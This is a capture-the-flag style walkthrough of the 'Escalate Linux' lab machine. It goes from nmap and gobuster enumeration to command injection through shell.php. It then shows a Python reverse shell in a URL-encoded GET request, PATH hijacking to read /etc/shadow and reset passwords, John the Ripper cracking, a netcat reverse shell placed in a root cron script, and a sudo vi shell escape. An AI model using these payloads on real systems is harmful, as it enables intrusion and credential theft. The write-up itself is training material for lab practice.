Escalate Linux

Scanning

Nmap

➜  ~ sudo nmap -A -p- -T4 Esclinux.vuln 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 10:27 EDT
Nmap scan report for Esclinux.vuln (172.16.129.139)
Host is up (0.0011s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34511/udp   mountd
|   100005  1,2,3      50751/tcp   mountd
|   100005  1,2,3      55807/tcp6  mountd
|   100005  1,2,3      57755/udp6  mountd
|   100021  1,3,4      38135/tcp   nlockmgr
|   100021  1,3,4      38777/tcp6  nlockmgr
|   100021  1,3,4      54049/udp   nlockmgr
|   100021  1,3,4      60507/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
38135/tcp open  nlockmgr    1-4 (RPC #100021)
41879/tcp open  mountd      1-3 (RPC #100005)
50079/tcp open  mountd      1-3 (RPC #100005)
50751/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:9F:EB:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX
​
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2021-08-12T10:27:39-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-12T14:27:39
|_  start_date: N/A
​
TRACEROUTE
HOP RTT     ADDRESS
1   1.07 ms Esclinux.vuln (172.16.129.139)
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.98 seconds

Enumeration

port 80 is opened let's take a look web server default page ...

Wappalyzer

Check directory

➜  ~ gobuster dir -u http://esclinux.vuln -w ~/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://esclinux.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/x/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/12 10:40:21 Starting gobuster in directory enumeration mode
===============================================================
/shell.php            (Status: 200) [Size: 29]
                                              
===============================================================
2021/08/12 10:40:21 Finished
===============================================================

/shell.php directory

let pass this var with ifconfig command

it works ... this vulnerability called command injection

Exploiting

sending reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.129.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'ip

set listening port

➜  ~ nc -nlvp 1234

GET request

http://esclinux.vuln/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22172.16.129.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27ip

We get SHELL

➜  ~ nc -nlvp 1234
listening on [any] 1234 ...
​
connect to [172.16.129.128] from (UNKNOWN) [172.16.129.139] 59640
/bin/sh: 0: can't access tty; job control turned off
$ whoami
user6

spawn shell

$ python3 -c "__import__('pty').spawn('/bin/bash')"
Welcome to Linux Lite 4.4 
 
Thursday 12 August 2021, 11:11:45
Memory Usage: 343/985MB (34.82%)
Disk Usage: 5/217GB (3%)
Support - https://www.linuxliteos.com/forums/ (Right click, Open Link)
 
 user6  / | var | www | html

Privilege Escalation

you can run Linux Privilege Escalation Awesome Script - LinPEAS for fast enumeration

here we go for manual way ...

#01 SUID rights Exploit

execute this command find / -perm -u=s -type f 2>/dev/null searching for "sticky bits"

run the shell

#02 Cracking the root password "PATH Variable"

as we notice that running /home/user5/script

trigger ls command

let's abuse this remember this exploit run because sticky bit -run as root-

cd /tmp
echo "cat /etc/shadow" > ls
chmod 777 ls
export PATH=/tmp:$PATH
cd /home/user5
./script

copy root shadow to attacker machine in text file called shadow

using john the ripper to crack password

➜  ~ john shadow  
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
12345            (?)
1g 0:00:00:00 DONE 2/3 (2021-08-12 12:31) 10.00g/s 2560p/s 2560c/s 2560C/s 123456..franklin
Use the "--show" option to display all of the cracked passwords reliably
Session completed

password is 12345

#03 Root shell by exploiting SUDO rights of user1

if all password hard to crack we can change

echo 'echo "user1:12345" | chpasswd' > ls
chmod 777 ls
export PATH=/tmp:$PATH
cd /home/user5
./script
su user1
sudo –l
sudo su

Credentials : user1:12345

sudo -l to list privilege of user

wait !! user1 can sudo all things with no password

#04 Reverse Root shell by exploiting crontab

cat /etc/crontab to see scheduled tasks

remember we have root access 3 ways above

lets create reverse shell

# attacker machine
➜  ~ msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.2.17 LPORT=443 -f raw
mkfifo /tmp/znaiyl; 172.16.129.128 4444 0</tmp/znaiyl | /bin/sh >/tmp/znaiyl 2>&1; rm /tmp/znaiyl
➜  ~ nc -nlvp 4444
# target shell
echo 'mkfifo /tmp/bxyrmrg; nc 172.16.129.128 4444 0</tmp/bxyrmrg | /bin/sh >/tmp/bxyrmrg 2>&1; rm /tmp/bxyrmrg' >> autoscript.sh

#05 Exploiting SUDO rights of vi editor

We changed the password of all the users to 12345 using the same methodology as above and switched between users to check for more exploits. We found that user8 has a sudo permission for vi editors.

run sudo vi

enter this in vi

:!sh
ids
PreviousPrivilege EscalationNextEscalate My Privilege

Last updated